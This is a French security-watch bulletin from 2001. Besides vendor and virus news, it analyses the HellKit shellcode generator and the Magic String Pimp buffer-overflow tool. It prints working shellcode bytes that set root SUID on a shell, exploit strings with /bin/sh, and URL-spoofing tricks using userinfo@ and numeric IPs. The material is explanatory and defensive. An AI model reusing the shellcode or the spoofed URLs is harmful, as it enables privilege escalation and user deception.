Les résultats d'une étude portant sur le niveau de sécurité théorique et pratique et menée sur 319 sites de
commerces électroniques ont été publiés. Les résultats sont loin d'être positif puisqu'ils font apparaître une très
faible utilisation du chiffrement SSL à 128 bits chez les professionnels dont les banques et courtiers en bourse.
Notons cependant une confusion quelque peu gênante dans une étude portant sur un sujet aussi sérieux. Il semble
notamment que le rôle du certificat serveur vis à vis des conditions d'établissement d'un session chiffrée (et donc
son impact sur le choix de la longueur de clef) ne soit pas compris. Cette erreur conduit ainsi à devoir reconsidérer
certaines conclusions de l'étude !
http://www.projetweb.com/labalise/securite/
HP
Utilitaire de contrôle de l'application des correctifs
HP annonce la disponibilité d'un utilitaire écrit en 'perl' et destiné à contrôler l'application des correctifs sur les
plates-formes HP-UX 11.00, 11.04 et 11.11. 'Security Patch Check' nécessite de disposer d'une connectivité
Internet afin de télécharger la dernière version de la liste des correctifs depuis le site HP.
http://www.software.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=B6834AA
ISS
Mise à jour de plusieurs produits ISS
'Database Scanner' XPU 1.1
Cette mise à jour permet la vérification de quatre vulnérabilités découvertes dans Microsoft SQL (débordement de
buffer, exposition des noms et mots de passe, déni de service).
http://www.iss.net/db_data/xpu/DB1.1.php
'Internet Scanner' XPU 4.9
Parmi les quatorze nouveaux test, cette mise à jour détecte les trames 802.11 erronées ainsi que les versions
vulnérables du démon 'snmpXdmid'.
http://www.iss.net/db_data/xpu/IS4.9.php
'RealSecure' XPU NS MU 2.3
Cette mise à jour détecte dix nouveaux types d'attaques de type déni de service, portes dérobées et autres.
http://www.iss.net/db_data/xpu/RSNS%20MU%202.3.php
http://www.iss.net/db_data/xpu/DB.php
http://www.iss.net/db_data/xpu/IS.php
http://www.iss.net/db_data/xpu/RS.php
ISS/NetworkICE
ISS acquiert Network ICE
Internet Security Systems, fournisseur de solutions sécurisées pour l'Internet vient d'acquérir Network ICE,
développeur d'applications d'intrusion et de détection. La transaction est estimée 195 millions de dollars, soit 4,3
millions de parts de la société ISS.
http://www.net-security.org/text/press/988721849,18169,.shtml
NIPC
Recrudescence de balayage des ports 511 et 111
Le NIPC publie, sous la référence 01-010, un bulletin d'alerte informant les utilisateurs Unix et dérivés d'une activité
importanTe de sondage des ports 515 et 111. Celle-ci serait un signe avant coureur d'attaques dirigées vers les
services 'lpd/LPRng' et 'RPC'.
http://www.nipc.gov/warnings/alerts/2001/01-010.htm
Page 38/45
Mai 2001
SANS
SANS Emergency Incident Handler
Le SANS propose depuis peu un nouveau site http://www.incidents.org/ qui a pour vocations d'informer, de
protéger les utilisateurs des nouvelles attaques ou virus afin ce celui-ci puisse régir afin de les détecter. Ce site
collecte aussi les adresses IP depuis lesquelles les attaques ont été menées. Ces informations sont fournies sous
forme de tableau ou de graphique.
http://www.incidents.org/
SYMANTEC/AXENT
Protection contre le débordement de buffer sous IIS 5.0
Symantec propose aux utilisateur d'ESM (Enterprise Security Manager), un correctif afin de mettre à jour les
fonctions de gestion de sécurité ESM. Il permet d'assurer la bonne gestion de la protection contre le débordement
de buffer sous IIS 5.0 (ISAPI/IPP) relative au bulletin MS01-023. Une signature pour 'NetProwler' sera
prochainement disponible.
http://www2.axent.com/swat/ESM/mfw/patch.ps5
VIRUS
Activité probable du virus 'Chernobyl'
C'est aujourd'hui, 26 avril, date anniversaire du drame, que le virus 'Chernobyl' doit se réveiller. Ce virus destructif
infecte et détruit les données du disque dur et du BIOS. Notons que la version 1.4 s'active chaque 26 du mois.
Seuls Windows 95 et 98 sont affectés.
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=PE_CIH
Diffusion du vers 'Homepage'
Dénommé 'HomePage' ou 'VBSWG.X', ce vers très médiatique a été créé à partir du générateur VBSWG ('VBS
Worm Generator'), utilitaire analysé en détail dans notre rapport de veille N°32 (mois de Mars). Il est transmis par
l'intermédiaire d'un courrier ayant pour sujet 'Homepage', contenant le message 'Hi! You've got to see this page!
It's really cool ;O)' et l'attachement 'HOMEPAGE.HTML.VBS'. Localement, le code actif du vers modifie la page
d'accueil du navigateur pour pointer vers l'un des quatre sites pornographiques prédéfinis et tente de se camoufler
en détruisant tous les courriers ayant pour sujet 'Homepage'. Il se propage en utilisant le carnet d'adresse OutLook.
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=VBS_HOMEPAGE.A
http://www.sophos.com/virusinfo/analyses/vbsvbswgx.html
http://vil.nai.com/villib/dispvirus.asp?virus_k=99082
http://www-1.ibm.com/services/continuity/recover1.nsf/advisories/8525680F006B944585256A47003BF4FE/$file/sva004.txt
Forte activité du vers 'sadmind/IIS' en France
Nous avons eu confirmation de l'activité du vers 'sadmind/IIS' sur plusieurs sites Français dés Lundi 7 Mai. Nous
rappelons en conséquence l'urgence de contrôler la présence des correctifs nécessaires (avis CERT CA-2001.11) sur
les systèmes Solaris Version <= 2.7 et les serveurs IIS 4.0 et 5.0.
http://www.cert.org/current/current_activity.html#sadmind-IIS
http://www.sophos.com/virusinfo/analyses/unixsadmind.html
http://vil.nai.com/villib/dispvirus.asp?virus_k=99085
ATTAQUES
OUTILS
HELLKIT !
# Description
L'exploitation d'une vulnérabilité de type 'débordement de buffer' nécessite l'écriture de deux programmes:
un programme destiné à s'exécuter sur le système cible et dénommé ShellCode probablement en référence à
l'activation quasi systématique d'un interpréteur de commande ou shell,
un programme d'interface destiné à transférer le code binaire du ShellCode sous la forme d'une chaîne de
caractère spécialement formatée.
Si l'écriture d'un programme d'interface portable ne pose que peu de problèmes, il en va tout autrement lorsqu'il
s'agit d'écrire le ShellCode. Cette opération est suffisamment complexe pour conduire de nombreux pirates à réutiliser
un code existant sans autre modification que le numéro de port TCP sur lequel sera activé l'interpréteur de
commande. Bien qu'aucune statistique ne soit disponible dans ce domaine, l'expérience permet de considérer que les
ShellCodes actuellement utilisés en environnement LINUX dérivent tout au plus d'une dizaine de souches.
La difficulté rencontrée provient de la combinaison des contraintes induites à deux niveaux:
1. le contexte d'exécution sur la cible: le code binaire doit non seulement être le plus concis possible afin de
pouvoir être exploité sur des buffers de faible taille mais il doit aussi respecter les spécificités du système
d'exploitation utilisé sur la cible.
Page 39/45
Mai 2001
2.
les conditions de transfert du code: le code binaire doit pouvoir être substitué aux données attendues par
l'application. Il doit en conséquence respecter un format généralement contraignant car interdisant l'utilisation de
nombreux caractères: caractères de contrôles, caractère 'NULL' voire caractères non imprimables. L'auteur devra
donc soigneusement sélectionner les instructions utilisées en rejetant toute instruction dont code binaire après
assemblage contiendra l'un des caractères non autorisés !
L'écriture d'un ShellCode est pourtant notablement facilitée par la diffusion de 'HellKit', un paquetage largement
diffusé écrit en Mars 2000 par un programmeur affilié au groupe TESO, association de 'jeunes programmeurs
enthousiastes' à l'origine de nombreux codes dont le vers Adore.
HellKit est livré sous forme de sources produisant, après compilation, trois exécutables dont en pratique seul
l'exécutable driver' sera directement utilisé. Le principe de fonctionnement est simple et efficace: l'utilisateur écrit un
ShellCode en langage C en se restreignant aux seules fonctions externes supportées. Ce source est ensuite analysé,
compilé et optimisé par l'utilitaire 'driver'.
Il est à noter que la technique de mise au format employée pour éliminer certains symboles présents dans le code
binaire natif conduit à encoder les chaînes de caractères rendant ainsi plus difficile la détection du shellcode par les
mécanismes d'analyse de signature classiques basés sur la recherche de chaînes spécifiques telle la chaîne '/bin/sh'.
La librairie fournie avec HellKit ne comporte pas moins de 12 appels systèmes pré encodés:
1. Positionnement dans un répertoire
3. Gestion des processus
- chdir(char *path)
- execve(char *s, char **argv, char **envp)
2. Manipulation de fichier
- fork(void)
- dup(int fd) et dup2(int ofd, int nfd)
4. Gestion des droits
- setreuid(int reuid, int euid)
- open(char *path, int mode, int flags)
- chown(char *path, int uid, int gid)
- read(int fd, void *buf, long count)
- chmod(char *path, int mode)
- write(int fd, void *buf, long count)
- chroot(char *path)
- close(int fd)
A titre d'exemple, le code (simpliste) suivant écrit en langage 'C' peut être rapidement transformé en un 'ShellCode'
de moins de 111 octets au moyen de la simple commande: ./driver code.c
%
Fichier 'code.c'
#include "../../lib/int80.h"
// Fichier de définition des appels
int main()
{
char *sh
= "mysh";
// Chemin d'accès à un interpréteur de commande
chown (sh, 0, 0);
// Le propriétaire et le groupe deviennent 'root'
chmod (sh, 06755);
// Positionnement des autorisations SUID et SGID
}
% Fichier 'shellcode.c' résultant
/*** Generated by Stealth's hellkit v1.2
*** Don't edit!
***/
unsigned char hell[] =
// Définition d'une variable contenant le code
"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff"
// machine binaire donc assemblé de la fonction
"\x83\xc6\x0d\x31\xc9\xb1\x58\x80\x36\x01"
// main définie dans le fichier 'code.c'
"\x46\xe2\xfa\xea\x04\x6c\x78\x72\x69\x01"
"\x80\xed\x66\x2a\x01\x01\x8c\x77\x01\x54"
"\x88\xe4\x57\x52\xe9\x01\x01\x01\x01\x5a"
"\x80\xc2\xaf\x11\x01\x01\x8c\xb2\x3b\xee"
"\xfe\xfe\xb9\xb7\x01\x01\x01\x30\xc8\x30"
"\xd3\x52\x88\xf2\xcc\x81\xb9\x0e\x01\x01"
"\x01\xb8\xec\x0c\x01\x01\x52\x88\xf2\xcc"
"\x81\x8c\x64\xf9\x5a\x5f\xc8\xc2\x91\x91"
"\x91\x91\x91\x91\x91\x91\x91\x91\x91\x91"
"\x91";
int main()
// Fonction permettant de tester le bon
{
// fonctionnement du code binaire.
// Son exécution provoque l'affichage de la
int (*f)();
// longueur du code et l'exécution de celui-ci
f = hell;
// Ici les propriétés du fichier mysh sont
printf("%d\n", strlen(hell));
// modifiée:
f();
//
rwsr-sr-x root root mysh
}
Une technique alternative plus souvent utilisée consiste à exploiter les services d'un interpréteur de commande. Le
code précédent peut ainsi être écrit sous la forme de la commande shell équivalente '/bin/sh -c chmod 6755 mysh'.
Le code généré atteint alors 143 octets mais reste indétectable, les chaînes caractéristiques '/bin/sh' et 'chmod' étant
encodées.
Page 40/45
Mai 2001
%
%
Commande 'équivalente'
#include "../../lib/int80.h"
#define NULL (void*)0
int main()
{
char *a[]=
{"/bin/sh","-c","chmod 6777 mysh",
NULL};
execve(*a, a, NULL);
return 0;
}
Fichier 'shellcode.c' résultant
/*** Generated by Stealth's hellkit v1.2
*** Don't edit!
***/
unsigned char hell[] =
"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff"
"\x83\xc6\x0d\x31\xc9\xb1\x78\x80\x36\x01"
"\x46\xe2\xfa\xea\x1a\x2e\x63\x68\x6f\x2e"
"\x72\x69\x01\x2c\x62\x01\x62\x69\x6c\x6e"
"\x65\x21\x37\x36\x36\x36\x21\x6c\x78\x72"
"\x69\x01\x80\xed\x66\x2a\x01\x01\x91\x54"
"\x88\xe4\x82\xed\x11\x52\xe9\x01\x01\x01"
"\x01\x5a\x80\xc2\xb9\x11\x01\x01\x8c\x92"
"\x1b\xee\xfe\xfe\x88\x54\xf1\x8c\x82\x23"
"\xee\xfe\xfe\x88\x44\xf5\x8c\x82\x24\xee"
"\xfe\xfe\x88\x44\xf9\xc6\x44\xfd\x01\x01"
"\x01\x01\x6b\x01\x8c\x44\xf1\x51\x53\xe9"
"\xba\xff\xfe\xfe\x30\xc1\x8a\x5c\xed\xc8"
"\xc2\x91\x91\x91\x91\x91\x91\x91\x91\x91"
"\x91\x91\x91";
int main()
{
int (*f)();
f = hell;
printf("%d\n", strlen(hell));
f();
}
// Fichier de définition des appels
// Définition de la commande à exécuter
// via l'interpréteur de commande /bin/sh
// Exécution de la commande
// Définition d'une variable contenant le code
// machine binaire donc assemblé de la fonction
// main définie dans le fichier source
//
//
//
//
//
//
//
Fonction permettant de tester le bon
fonctionnement du code binaire.
Son exécution provoque l'affichage de la
longueur du code et l'exécution de celui-ci
Ici les propriétés du fichier mysh sont
modifiée:
rwsr-sr-x root root /bin/sh
http://teso.scene.at/releases/hellkit-1.2.tar.gz
MAGIC STRING PIMP !
# Description
L'utilitaire 'Magic String Pimp' ou 'MSP', écrit en langage C, est décrit par son auteur comme étant un générateur
de chaînes de caractères permettant d'exploiter un débordement de buffer:
Magic String Pimp is a command line tool that allows you to create Magic buffer overflow strings in various ways.
It is mainly meant as a tool for Proof Of Concept exploit coders. And takes away the tedious task of writing
exploits just to prove simple overflows exploitable
Non seulement cet outil génère une chaîne de caractères permettant d'exploiter localement un débordement de buffer
localisé dans une quelconque application fonctionnant en environnement LINUX x86 mais il autorise aussi l'activation
locale de l'attaque lorsque certaines options sont correctement positionnées.
Comme cela est souvent le cas avec les outils d'attaque 'underground', la documentation fournie reste très discrète
sur le mode de fonctionnement exact de l'outil. Le recours à une analyse détaillée du code source permettra alors de
comprendre les principes mis en œuvre mais aussi de contrôler l'innocuité de l'outil, à savoir l'absence de
fonctionnalités dissimulées.
'MSP' propose trois modèles de ShellCode actuellement codés en dur mais devant être regroupés à terme dans une
librairie indépendante:
- Le modèle type 1 (47 octets de code) retourne un bourne shell (/bin/sh) ouvert sous l'autorité de l'application
attaquée,
- Le modèle type 2 (49 octets de code) retourne un shell mininal (/bin/sash) disposant des privilèges de
l'application attaquée,
- Le modèle type 3 (139 octets de code) positionne le bit SUID 'root' sur le fichier /tmp/own préalablement créé
par 'MSP'.
Le modèle de code ainsi sélectionné est modifié pour tenir compte des paramètres d'utilisation (taille du buffer cible,
position estimée du pointeur de pile, …) puis formaté pour tenir compte du contexte d'activation. Ainsi, 'MSP' est à
même de générer une chaîne d'exploitation conforme à l'un des trois contextes d'activation couramment rencontrés:
1. Débordement d'un buffer de grande taille (>400 octets)
Page 41/45
Mai 2001
Dans un tel contexte, la localisation exacte dans la pile de
l'adresse de retour de la fonction ayant déclaré le tampon
est difficilement prédictible. Un assemblage classique
conforme au modèle NOP - SHELLCODE - RET est alors
privilégié.
Le remplissage partiel du tampon est effectué avec une
instruction nulle la plus courte possible, à savoir
l'instruction NOP dont le code n'occupe qu'un octet
dans les exemples présentés en suivant). Le
(symbole
code d'exploitation (le ShellCode) est ensuite écrit suivi
d'une répétition de l'adresse de branchement (4 octets)
sur ce code. En cas d'erreur sur l'estimation de la taille du
tampon ou de l'adresse de retour, le branchement sera
effectué sur la zone de garde constituée des NOP.
Pile
buffer
myfunction(char * value)
{
char buffer[256];
int var;
...
strcpy(tampon,value);
...
return;
}
ShellCode
‘return’
© APOGEE Communications
Pile
2.
Débordement d'un buffer de faible taille (< 400 octets)
La logique précédemment utilisée ne permet plus de
{
garantir le positionnement correct du ShellCode dans la
char buffer[256];
int var;
pile, celui-ci risquant d'écraser la zone contenant l'adresse
...
de retour de la fonction appelante. Un nouveau modèle
...
buffer
return;
d'assemblage doit alors être utilisé: RET - NOP }
SHELLCODE.
Il est ainsi préférable de remplir le tampon avec l'adresse
‘return’
estimée de branchement sur le ShellCode en débordant
largement.
La zone de garde constituée de NOP est ensuite écrite
suivie du ShellCode. Ici encore, en cas d'erreur de
ShellCode
positionnement, le branchement sera effectué quelque part
dans la zone de garde.
Pile
3. Ecrasement d'une variable d'environnement
Cette technique alternative peut être utilisée lorsque la
{
trop faible taille du buffer cible n'autorise pas le placement
char buffer[256];
int var;
d'un ShellCode ou bien quand l'exécution des données en
...
buffer
pile n'est pas autorisée.
...
return;
Le ShellCode est alors placé dans une zone mémoire
}
‘return’
située en dehors de la pile courante du processus attaqué,
en l'occurrence, dans une variable d'environnement créé à
cet effet par l'utilitaire 'MSP'.
ENV
Le buffer est alors simplement écrasé par plusieurs copies
de l'adresse de cette variable d'environnement (4 octets).
Trois variations de cette technique sont proposée par
ShellCode
'MSP'.
Un exemple concret présentant chacune des chaînes de caractères susceptibles d'être générées par MSP est proposé
ci après, les différentes structures étant mises en évidence par la couleur de fond:
Buffer > 400 octets
./msp -s 300 -T 1 -S -t 1
Buffer < 400 octets
./msp -s 300 -T 1 -S -t 2
ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõ
ÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿
ë^__~Iüf÷Ô1À~J^GGW®uý~Hg ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõ
ÿHuö[SPZ~Iá°^KÍ~@èÜÿÿÿÂ/bin/shÂ¿D÷ ÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿
ÿ¿D÷ÿ¿D÷ÿ¿D÷ÿ¿D÷ÿ¿D÷ÿ¿D÷ÿ¿D÷ÿ¿D÷ÿ¿D÷ ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿ìõÿ¿
ÿ¿D÷ÿ¿D÷ÿ¿D÷ÿ¿
Variables d'environnement
./msp -s 300 -T 1 -S -t 3
DUN=
ë^__
~Iüf÷Ô1À~J^GGW®uý~HgÿHuö[SPZ~Iá°^KÍ~@è
ÜÿÿÿÂ/bin/shÂ
RET=^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ
¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^P
õÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿
^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põ
ÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^
Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ
@ë^__~Iüf÷Ô1À~J^GGW®uý~ ^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põÿ¿^Põ
HgÿHuö[SPZ~Iá°^KÍ~@èÜÿÿÿÂ/bin/shÂ
ÿ¿^Põÿ¿^Põÿ¿^õÿ¿^Põÿ¿^Põÿ¿
Il est amusant de constater que MSP contient lui même un débordement de buffer (combinaison particulière des
Page 42/45
Mai 2001
options -t et -s (ie: -t 1 -s 200) ! Nul n'est à l'abri d'une erreur de codage …
Les lecteurs désireux d'en savoir plus sur ces trois techniques d'exploitation d'un débordement de buffer pourront se
reporter avec profit au document de référence 'Smashing the stack for Fun and Profit' publié en Novembre
1996 par aleph1 dans le numéro 49 de Phrack Magazine.
http://www.phrack.com/search.phtml?view&article=p49-14
http://orbita.starmedia.com/~dizznutt/code/msp-0.01.tar.gz
(page non accessible à la date de publication)
TECHNIQUES
MANIPULATION D’URL
# Description
Il est assez courant de rencontrer une adresse de sites WEB utilisant une forme exotique et difficilement interprétable
car constituée d’une succession de symboles et caractères numériques. L’utilisateur non averti aura ainsi quelques
difficultés à déterminer sur quoi pointe l’URL http://3254959035/%69%6e%64%65%78%2e%68%74%6d
sauf à tester celle-ci avec les risques que cela peut comporter !
L’utilisation d’adresses difficilement interprétables n’est pas un phénomène anodin mais bien le résultat d’une volonté
délibérée d’induire en erreur les mécanismes d’analyse qu’il s’agisse de ceux d’un être humain, l’utilisateur, ou de ceux
implémentés dans les équipements, notamment les dispositifs de filtrage.
La BBC a ainsi dernièrement fait l’objet d’une attaque destinée à atteindre à son image de marque via la publication
sur son site d’information d’une nouvelle erronée concernant la mort d’une pop star. Début Mai, quelques grands
médias ont ainsi pu titrer à la ‘Une’ «BBC announces death of pop star» ou encore «BBC falls down server hole»
mettant dans l’embarras la direction de la BBC. Jusque là rien de plus ‘banal’ d’autant que quelques jours auparavant,
et pour la première fois, un site WEB d’information de la BBC a fait l’objet d’un vitriolage en règle de la part d’un
groupe d’activistes (une copie de la page WEB manipulée est disponible sur le site d’Attrition) ajoutant à la confusion.
En effet, la publication de la fausse nouvelle sur le site de la BBC a pu être effectuée sans aucune manipulation ou
modification du site original !
La technique utilisée ?
….. Une adresse WEB utilisant une syntaxe induisant en erreur une écrasante majorité d’utilisateurs !
Ainsi, l’adresse de site http://news.bbc.co.uk!articles@3254959035/%69%6e%64%65%78%2e%68%74%6d ne
pointe pas une page du site de la BBC mais tout simplement la page d’accueil du serveur d’APOGEE
Communications !
Cette technique est tellement efficace qu’un rappel des principes de construction et d’analyse des adresses WEB
semble indispensable. A ce jour, les références actuellement applicables en matière de composition et d’interprétation
d’une adresse WEB sont :
- D’une part, le RFC1630 publié en Juin 94 et intitulé ‘URI’s in WWW’, qui spécifie non seulement la syntaxe d’une
URL sous la forme d’une grammaire BNF mais aussi chacun des schémas d’accès normalisés,
- D’autre part, le RFC2396 intitulé ‘Uniform Resource Identifier (URI) : Generic Syntax‘ et publié en Août 98
dont l’objectif est de fournir une spécification générique applicable à tout identifiant de ressources. Ce document, qui
résulte de la fusion des RFC1736 et RFC1737, propose une syntaxe compatible avec celle définie dans le cadre plus
restreint des services Web par le RFC 1630.
Une lecture attentive de ces deux documents de références est nécessaire pour déterminer avec précision le domaine
de validité d’une syntaxe particulière, et plus précisément, la logique d’analyse conduisant à déterminer sa portée.
Attention toutefois, la logique spécifiée dans un standard de type RFC peut ne pas être totalement respectée par un
produit libre ou commercial. De nombreux exemples viennent prouver les libertés d’interprétations prises par certains
éditeurs dans ce domaine: traitement des balises étendues HTML par les deux navigateurs les plus connus, gestion des
mécanismes d’authentification HTTP, …
Le RFC2396 défini ainsi une URI (Uniform Resource Identifier) comme étant une chaîne de caractères permettant
d’identifier une ressource abstraite ou physique. Cette définition englobe deux éléments plus concrets :
- l’URL (Uniform Resource Locator) permettant d’identifier une ressource par une description du moyen d’accès, la
localisation dans le réseau,
- l’URN (Uniform Resource Name) dont l’objet premier est le nommage d’une ressource par le biais d’un identifiant
persistant.
Toute URI, et par conséquent, toute URL ou URN, est exprimée la forme d’une chaîne constituée de 4 composantes :
<scheme>
:// <authority> <path> ? <query>
Dans le cas plus précis d’une URL, la signification de ces composantes est la suivante :
# La méthode (scheme) : cette composante permet d’identifier la méthode d’accès, c’est-à-dire, le plus souvent le
protocole devant être utilisé. Actuellement, le RFC1630 spécifie 12 méthodes d’accès élémentaires (http, ftp,
gopher, mailto, afs, news, telnet, rlogin, tn3270, wais, file, mid et cid) dont deux (mid, cid) semblent ne pas avoir
été implémentées. D’autres méthodes sont détaillées dont celle décrite (ldap) dans le RFC2255 permettant l’accès
aux services LDAP.
# L’autorité (authority) : cette composante contient l’ensemble des informations nécessaires à la localisation de la
ressource. En pratique, il s’agit de l’ensemble des éléments requis pour ouvrir et établir le protocole associé à la
Page 43/45
Mai 2001
méthode d’accès. La syntaxe spécifiée par le RFC2396 rationalise celle initialement décrite RFC1630 en instituant
une syntaxe générique de la forme ‘[userinfo@]host[:port]’, userinfo pouvant contenir n’importe quel
caractère non réservé et notamment les caractères ‘;’, ‘:’, ‘&’ , ‘=’, ‘+’, ‘$’, ’,’.
# Le chemin (path) :
cette composante, le plus souvent optionnelle permet de référencer la ressource
indépendamment de la localisation (réseau) de celle-ci.
# La requête (query) :
initialement réservée aux paramètres de description de la requête, cette composante est
désormais considérée comme un chaîne d’information destinée à être interprétée par la cible.
Les syntaxes suivantes (présentée sous une forme simplifiée afin d’améliorer la lisibilité) sont donc parfaitement
valides:
& Définitions élémentaires du RFC1630:
http :// [host[:port]
afs
:// [host[:port]
wais :// [host[:port]
ldap :// [host[:port]
ftp
:// [user[:password]@]host[:port]
telnet :// [user[:password]@]host[:port]
mailto :// name@host
[/path]
[?search]
/path
/database [?search]
[/[dn[?[attrib][?[scope][?[filter][exts]]]]]]
/path
[ftptype]
[?subject]
& Extension générique du RFC2396:
[userinfo@]host[:port]
Ces premiers éléments permettent d’analyser l’adresse à la base de la campagne de désinformation de la BBC :
http :// news.bbc.co.uk!articles@3276960428 /hi/english/uk/newsid/123456.htm
# La chaîne ‘news.bbc.co.uk!articles@’ correspond au champ ‘userinfo@’ et non à l’adresse d’un site même si la
forme et le contenu laisse supposer le contraire. La transmission de ces éléments au service distant dépendra de
la méthode d’accès utilisée. En mode HTTP, ces éléments sont mémorisés par le navigateur, et ne sont transmis
qu’à la demande explicite du serveur lorsque celui-ci requiert une authentification.
# La chaîne ‘3276960428’ correspond au champ ‘host’ bien que sa forme soit inhabituelle car purement
numérique.
Le problème est maintenant d’analyser cette forme numérique et de vérifier sa conformité vis à vis des exigences
mentionnées dans les deux RFC de référence. Ceux-ci spécifient deux formes:
- Hostname:
nom d’un système conforme au nommage DNS, c-à-d une succession de chaîne de caractères
imprimables séparés par le caractère ‘.’
- Ipv4address: adresse IP sous la forme dite IP pointée, ou dotted IP, c-à-d quatre séries de chiffres décimaux
compris entre 0 et 255 séparés par le caractère ‘.’
Il apparaît donc que la syntaxe utilisée n’étant pas spécifiée, celle-ci ne devrait pas fonctionner. Et pourtant, elle
conduit les dernières versions de navigateurs ‘classiques’ – notamment Microsoft IE5.5 et Netscape 6.0 - à se
connecter sur un site dont rien ne permet d’identifier le nom ou l’adresse au format IP pointé classique !
L’explication de ce comportement doit être recherchée dans la stratégie de traitement d’une URL dont certaines
composantes peuvent être interprétées au niveau du navigateur, et sont en conséquence susceptibles de déroger aux
règles édictées par les RFC. Les deux principaux types de traitement sont synthétisés sur les schémas suivants :
1. Mode ‘Normal’ :
scheme :// autority path ? query
les composantes permettant
de localiser le site et la
méthode d’accès sont
GET path ? query
scheme :// autority
Site
directement traitées par le
navigateur.
Navigateur
2. Mode ‘Proxy’ :
GET scheme :// autority path ? query
GET path ? query
la totalité de l’URL est
transmise en l’état vers un
proxy
scheme :// autority
Site
service intermédiaire, le
proxy qui agit pour le
Navigateur
Proxy
compte de l’utilisateur.
En pratique, l’interprétation de la composante ‘autority’ par les navigateurs classiques est réalisée en considérant que
toute chaîne ne respectant pas un format d’adresse IP pointée doit être interprétée comme un nom de système. Ce
nom est ensuite traduit sous la forme d’une adresse IP en s’appuyant sur un service de résolution de nom.
En environnement Windows, cette traduction est généralement assurée par la fonction universelle ‘InternetConnect’
présente dans la librairie dynamique ‘WinInet.dll’. Hélas, l’implémentation de cette fonction intègre un comportement
non documenté consistant à interpréter toute chaîne numérique comme étant une adresse IP écrite au format décimal.
Le lecteur pourra s’en convaincre en testant cette fonction au moyen d’un petit programme écrit en visual basic dérivé
de celui proposé sur le site VbSquare. Notons à ce propos qu’un avis émis par Microsoft sous la référence MS98-016
‘Dotless IP Address’ mettait en évidence ce comportement sans pour autant le corriger, le correctif fourni visant
simplement à éviter que le navigateur ouvre le site dans un contexte de sécurité considéré comme local (celui d’un
Intranet) !
Ces nouveaux éléments permettent de finaliser l’analyse de la composante ‘autority’ de l’URL précédente:
http :// news.bbc.co.uk!articles@3276960428 /hi/english/uk/newsid/123456.htm
# La chaîne ‘3276960428’ correspond au champ ‘host’ interprété comme contenant une adresse IP de 32bits
Page 44/45
Mai 2001
exprimée au format décimal :
3276960428
(décimal)
-> C35272AC
(hexadécimal 32bits)
-> C3.52.72.AC
(hexadécimal 4*8bits)
-> 195.82.114.172
(décimal pointé)
En résumé, l’utilisateur peu méfiant est persuadé se connecter sur le site ‘news.bbc.co.uk‘ et accéder à l’article
‘3276960428/hi/english/uk/newsid/123456.htm’ tout en étant dirigé sans le savoir sur une page référencée
‘hi/english/uk/newsid/123456.htm’ et localisé sur le site ayant pour adresse 195.82.114.172
Pour conclure, rappelons que les deux techniques de dissimulation présentées peuvent encore être améliorées par:
1. L’utilisation d’une base non décimale dans la composante ‘autority’
Toutes les formes suivantes sont ainsi valides et représentent la même adresse IP !
Adresse Dotted IP exprimée en base décimale:
http://194.2.187.187
Adresse Dotted IP exprimée en base octale:
http://0302.02.0273.0273
Adresse Dotted IP exprimée en base hexadécimale:
http://0xC2.0x02.0xBB.0xBB
Adresse numérique 32bits exprimée en base décimale:
http://3254959035
Adresse numérique 32bits exprimée en base octale:
http://030200535673
Adresse numérique 32bits exprimée en base hexadécimale:
http://0xC202BBBB
2. L’utilisation du caractère d’échappement ‘%’
Tout caractère peut être transcodé au moyen du caractère d’échappement ‘%’ à l’exception des caractères du
composant ‘scheme’. Précisons que l’échappement de l’un des caractères réservés (‘%’, ‘/’, ‘#’, ‘ ?’, ‘*’) lui fait
perdre sa sémantique originale. Ainsi, le caractère ‘/’ n’a plus la signification de séparateur hiérarchique s’il est
encodé en ‘%2F’. En pratique, les URL suivantes ne sont donc pas équivalentes :
http://veille.apogee-com.fr/documents.d/Analyses/Attaques/index.html
http://veille.apogee-com.fr/documents.d/Analyses/Attaques%2Findex.html
Hormis ces exceptions, l’URL http://www.apogee-com.fr/index.htm peut ainsi être encodée en :
Http://www.apogee-com.fr/%69%6E%64%65%78%2E%68%74%6D
ou encore
Http://www.apogee-com.fr/%69%6E%64%65%78.%68%74%6D
ou une combinaison purement illisible telle
Http://%77%77%77%2E%61%70%6F%67%65%65%2D%63%6F%6D%2E%66%72/%69%6E%64%65%78%2E%68%74%6D
Le tableau suivant propose une synthèse de schémas d’encodage des différentes composantes d’une URL, encodages
testés et considérés comme valide par les deux plus grands navigateurs en environnement Windows. Aucun test n’a
été réalisé sur d’autres versions de navigateurs ou dans d’autres environnements d’exploitation.
scheme :// userinfo@
host
:port
/
path
Le navigateur
transmet
X
X
X
X
X
X
X
Le proxy
transmet
X
X
X
X
Sans Proxy
Le navigateur
transmet
condition
X
X
Formatage
Libre
oui
oui
Echappement ‘%’
autorisé
autorisé autorisé
autorisé
Forme autorisée Caractères alpha
autorisé
autorisé
autorisé
Numérique
autorisé
autorisé autorisé
autorisé
Forme adresse
Nom DNS
(n.d.tld)
X
4*8bits Décimal (a.b.c.d)
